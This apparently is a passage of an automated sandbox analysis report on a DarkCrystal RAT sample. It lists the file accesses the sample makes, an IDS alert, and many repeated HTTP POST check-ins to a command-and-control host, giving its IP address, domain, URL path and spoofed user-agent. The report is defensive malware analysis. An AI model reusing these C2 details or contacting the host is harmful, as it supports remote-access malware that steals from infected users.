Source: C:\Blockcomcrt\AgentMonitor.exe; File opened: C:\Users\user
Source: C:\Blockcomcrt\AgentMonitor.exe; File opened: C:\Users\user\AppData
Source: C:\Blockcomcrt\AgentMonitor.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Blockcomcrt\AgentMonitor.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Blockcomcrt\AgentMonitor.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Blockcomcrt\AgentMonitor.exe; File opened: C:\Users\user\Documents\desktop.ini

                                    Networking

                                    Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.8:49707 -> 80.211.144.156:80
                                    Source: Joe Sandbox View, IP Address: 80.211.144.156
                                    Source: Joe Sandbox View, ASN Name: ARUBA-ASNIT
                                    Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 373292cm.nyashka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 152740Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
